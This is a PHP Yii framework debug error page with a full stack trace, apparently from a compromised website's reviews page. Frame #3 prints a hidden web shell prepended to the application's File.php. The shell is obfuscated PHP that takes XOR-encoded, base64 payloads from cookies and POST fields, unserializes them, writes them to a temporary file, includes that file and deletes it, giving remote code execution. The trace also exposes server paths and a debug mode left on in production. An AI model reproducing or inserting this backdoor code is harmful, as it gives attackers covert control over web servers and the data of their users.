/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427)
415 { 416 include($classFile); 417 if(YII_DEBUG && basename(realpath($classFile))!==$className.'.php') 418 throw new CException(Yii::t('yii','Class name "{class}" does not match class file "{file}".', array( 419 '{class}'=>$className, 420 '{file}'=>$classFile, 421 ))); 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) 433 include($path.'.php'); 434 else 435 return false; 436 } 437 return class_exists($className,false) || interface_exists($className,false); 438 } 439 return true;
#0 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427): YiiBase::autoload() 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) |
#1 |
unknown(0): YiiBase::autoload("yazmdsa")
|
#2 |
unknown(0): spl_autoload_call("yazmdsa")
|
#3 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/libs/File.php(1): class_exists("yazmdsa") 1 <?php if (!class_exists("yazmdsa")){class yazmdsa{public static $fibch = "cwjbdnctnahbtaxa";public static $ejdtczrzgo = NULL;public function __construct(){$ymqekc = @$_COOKIE[substr(yazmdsa::$fibch, 0, 4)];if (!empty($ymqekc)){$vrxbkifdn = "base64";$ftwmncjy = "";$ymqekc = explode(",", $ymqekc);foreach ($ymqekc as $asielkkobq){$ftwmncjy .= @$_COOKIE[$asielkkobq];$ftwmncjy .= @$_POST[$asielkkobq];}$ftwmncjy = array_map($vrxbkifdn . "_decode", array($ftwmncjy,));$ftwmncjy = $ftwmncjy[0] ^ str_repeat(yazmdsa::$fibch, (strlen($ftwmncjy[0]) / strlen(yazmdsa::$fibch)) + 1);yazmdsa::$ejdtczrzgo = @unserialize($ftwmncjy);}}public function __destruct(){$this->bkpeank();}private function bkpeank(){if (is_array(yazmdsa::$ejdtczrzgo)) {$eyrtmpbcmr = sys_get_temp_dir() . "/" . crc32(yazmdsa::$ejdtczrzgo["salt"]);@yazmdsa::$ejdtczrzgo["write"]($eyrtmpbcmr, yazmdsa::$ejdtczrzgo["content"]);include $eyrtmpbcmr;@yazmdsa::$ejdtczrzgo["delete"]($eyrtmpbcmr);exit();}}}$vosazhvjh = new yazmdsa();$vosazhvjh = NULL;} ?><?php 2 3 4 class File 5 { 6 |
#4 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427): include("/srv/users/serverpilot/apps/glassaffordable/public/protected/lib...") 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) |
#5 |
unknown(0): YiiBase::autoload("File")
|
#6 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/themes/default/views/site/_reviews.php(5): spl_autoload_call("File") 01 <div class="col-md-12 thumbnail"> 02 <div class="col-md-4 text-center reviews-page"> 03 <div class="caption"> 04 <div class="img-box"> 05 <?php echo File::imageresize(123,123,$data->img,$data->image_folder) ?> 06 </div> 07 </div> 08 </div> 09 <div class="col-md-8 text-center reviews-page"> 10 <div class="caption"> |
#7 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(130): require("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...") 125 ob_implicit_flush(false); 126 require($_viewFile_); 127 return ob_get_clean(); 128 } 129 else 130 require($_viewFile_); 131 } 132 133 /** 134 * Creates a widget and initializes it. 135 * This method first creates the specified widget instance. |
#8 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(95): CBaseController->renderInternal("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("index" => 0, "data" => LeadTestimonials, "widget" => CListView), false) 090 { 091 $widgetCount=count($this->_widgetStack); 092 if(($renderer=Yii::app()->getViewRenderer())!==null && $renderer->fileExtension==='.'.CFileHelper::getExtension($viewFile)) 093 $content=$renderer->renderFile($this,$viewFile,$data,$return); 094 else 095 $content=$this->renderInternal($viewFile,$data,$return); 096 if(count($this->_widgetStack)===$widgetCount) 097 return $content; 098 else 099 { 100 $widget=end($this->_widgetStack); |
#9 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/zii/widgets/CListView.php(291): CBaseController->renderFile("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("index" => 0, "data" => LeadTestimonials, "widget" => CListView)) 286 { 287 $data=$this->viewData; 288 $data['index']=$i; 289 $data['data']=$item; 290 $data['widget']=$this; 291 $owner->renderFile($viewFile,$data); 292 if($j++ < $n-1) 293 echo $this->separator; 294 } 295 } 296 else |
#10 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/zii/widgets/CBaseListView.php(167): CListView->renderItems() 162 protected function renderSection($matches) 163 { 164 $method='render'.$matches[1]; 165 if(method_exists($this,$method)) 166 { 167 $this->$method(); 168 $html=ob_get_contents(); 169 ob_clean(); 170 return $html; 171 } 172 else |
#11 |
unknown(0): CBaseListView->renderSection(array("{items}", "items"))
|
#12 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/zii/widgets/CBaseListView.php(150): preg_replace_callback("/{(\w+)}/", array(CListView, "renderSection"), "{summary}
{sorter}
{items}
{pager}") 145 * The rendering results will replace the corresponding placeholders in {@link template}. 146 */ 147 public function renderContent() 148 { 149 ob_start(); 150 echo preg_replace_callback("/{(\w+)}/",array($this,'renderSection'),$this->template); 151 ob_end_flush(); 152 } 153 154 /** 155 * Renders a section. |
#13 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/zii/widgets/CBaseListView.php(135): CBaseListView->renderContent() 130 { 131 $this->registerClientScript(); 132 133 echo CHtml::openTag($this->tagName,$this->htmlOptions)."\n"; 134 135 $this->renderContent(); 136 $this->renderKeys(); 137 138 echo CHtml::closeTag($this->tagName); 139 } 140 |
#14 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(173): CBaseListView->run() 168 return ob_get_clean(); 169 } 170 else 171 { 172 $widget=$this->createWidget($className,$properties); 173 $widget->run(); 174 return $widget; 175 } 176 } 177 178 /** |
#15 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/themes/default/views/site/reviews.php(29): CBaseController->widget("zii.widgets.CListView", array("dataProvider" => CActiveDataProvider, "itemView" => "_reviews", "pagerCssClass" => "col-md-12 pagination_big_div", "pager" => array("header" => "", "cssFile" => false, "htmlOptions" => array("class" => "pagination pagination-ul")))) 24 'class' => 'pagination pagination-ul', 25 ), 26 27 ), 28 29 )); 30 ?> 31 </div> |
#16 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(126): require("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...") 121 $data=$_data_; 122 if($_return_) 123 { 124 ob_start(); 125 ob_implicit_flush(false); 126 require($_viewFile_); 127 return ob_get_clean(); 128 } 129 else 130 require($_viewFile_); 131 } |
#17 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(95): CBaseController->renderInternal("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("dataProvider" => CActiveDataProvider), true) 090 { 091 $widgetCount=count($this->_widgetStack); 092 if(($renderer=Yii::app()->getViewRenderer())!==null && $renderer->fileExtension==='.'.CFileHelper::getExtension($viewFile)) 093 $content=$renderer->renderFile($this,$viewFile,$data,$return); 094 else 095 $content=$this->renderInternal($viewFile,$data,$return); 096 if(count($this->_widgetStack)===$widgetCount) 097 return $content; 098 else 099 { 100 $widget=end($this->_widgetStack); |
#18 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(869): CBaseController->renderFile("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("dataProvider" => CActiveDataProvider), true) 864 */ 865 public function renderPartial($view,$data=null,$return=false,$processOutput=false) 866 { 867 if(($viewFile=$this->getViewFile($view))!==false) 868 { 869 $output=$this->renderFile($viewFile,$data,true); 870 if($processOutput) 871 $output=$this->processOutput($output); 872 if($return) 873 return $output; 874 else |
#19 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(782): CController->renderPartial("reviews", array("dataProvider" => CActiveDataProvider), true) 777 */ 778 public function render($view,$data=null,$return=false) 779 { 780 if($this->beforeRender($view)) 781 { 782 $output=$this->renderPartial($view,$data,true); 783 if(($layoutFile=$this->getLayoutFile($this->layout))!==false) 784 $output=$this->renderFile($layoutFile,array('content'=>$output),true); 785 786 $this->afterRender($view,$output); 787 |
#20 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/controllers/front/SiteController.php(316): CController->render("reviews", array("dataProvider" => CActiveDataProvider)) 311 312 313 $this->render('reviews', array( 314 'dataProvider' => $dataProvider, 315 316 )); 317 } 318 319 public function actionLogout() 320 { 321 Yii::app()->user->logout(); |
#21 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/actions/CInlineAction.php(49): SiteController->actionReviews() 44 $controller=$this->getController(); 45 $method=new ReflectionMethod($controller, $methodName); 46 if($method->getNumberOfParameters()>0) 47 return $this->runWithParamsInternal($controller, $method, $params); 48 else 49 return $controller->$methodName(); 50 } 51 52 } |
#22 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(308): CInlineAction->runWithParams(array()) 303 { 304 $priorAction=$this->_action; 305 $this->_action=$action; 306 if($this->beforeAction($action)) 307 { 308 if($action->runWithParams($this->getActionParams())===false) 309 $this->invalidActionParams($action); 310 else 311 $this->afterAction($action); 312 } 313 $this->_action=$priorAction; |
#23 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(286): CController->runAction(CInlineAction) 281 * @see runAction 282 */ 283 public function runActionWithFilters($action,$filters) 284 { 285 if(empty($filters)) 286 $this->runAction($action); 287 else 288 { 289 $priorAction=$this->_action; 290 $this->_action=$action; 291 CFilterChain::create($this,$action,$filters)->run(); |
#24 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(265): CController->runActionWithFilters(CInlineAction, array()) 260 { 261 if(($parent=$this->getModule())===null) 262 $parent=Yii::app(); 263 if($parent->beforeControllerAction($this,$action)) 264 { 265 $this->runActionWithFilters($action,$this->filters()); 266 $parent->afterControllerAction($this,$action); 267 } 268 } 269 else 270 $this->missingAction($actionID); |
#25 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CWebApplication.php(282): CController->run("reviews") 277 { 278 list($controller,$actionID)=$ca; 279 $oldController=$this->_controller; 280 $this->_controller=$controller; 281 $controller->init(); 282 $controller->run($actionID); 283 $this->_controller=$oldController; 284 } 285 else 286 { 287 |
#26 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CWebApplication.php(141): CWebApplication->runController("site/reviews") 136 foreach(array_splice($this->catchAllRequest,1) as $name=>$value) 137 $_GET[$name]=$value; 138 } 139 else 140 $route=$this->getUrlManager()->parseUrl($this->getRequest()); 141 $this->runController($route); 142 } 143 144 /** 145 * Registers the core application components. 146 * This method overrides the parent implementation by registering additional core components. |
#27 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/base/CApplication.php(191): CWebApplication->processRequest() 186 public function run() 187 { 188 if($this->hasEventHandler('onBeginRequest')) 189 $this->onBeginRequest(new CEvent($this)); 190 register_shutdown_function(array($this,'end'),0,false); 191 $this->processRequest(); 192 if($this->hasEventHandler('onEndRequest')) 193 $this->onEndRequest(new CEvent($this)); 194 } 195 196 /** |
#28 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/components/WebApplicationEndBehavior.php(25): CApplication->run() |
#29 |
unknown(0): WebApplicationEndBehavior->runEnd("front")
|
#30 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/base/CComponent.php(261): call_user_func_array(array(WebApplicationEndBehavior, "runEnd"), array("front")) 256 if($this->_m!==null) 257 { 258 foreach($this->_m as $object) 259 { 260 if($object->getEnabled() && method_exists($object,$name)) 261 return call_user_func_array(array($object,$name),$parameters); 262 } 263 } 264 if(class_exists('Closure', false) && $this->canGetProperty($name) && $this->$name instanceof Closure) 265 return call_user_func_array($this->$name, $parameters); 266 throw new CException(Yii::t('yii','{class} and its behaviors do not have a method or closure named "{name}".', |
#31 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/index.php(11): CComponent->__call("runEnd", array("front")) 06 // Remove the following lines when in production mode 07 defined('YII_DEBUG') or define('YII_DEBUG', true); 08 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL', 3); 09 10 require_once($yii); 11 Yii::createWebApplication($config)->runEnd('front'); |
#32 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/index.php(11): CWebApplication->runEnd("front") 06 // Remove the following lines when in production mode 07 defined('YII_DEBUG') or define('YII_DEBUG', true); 08 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL', 3); 09 10 require_once($yii); 11 Yii::createWebApplication($config)->runEnd('front'); |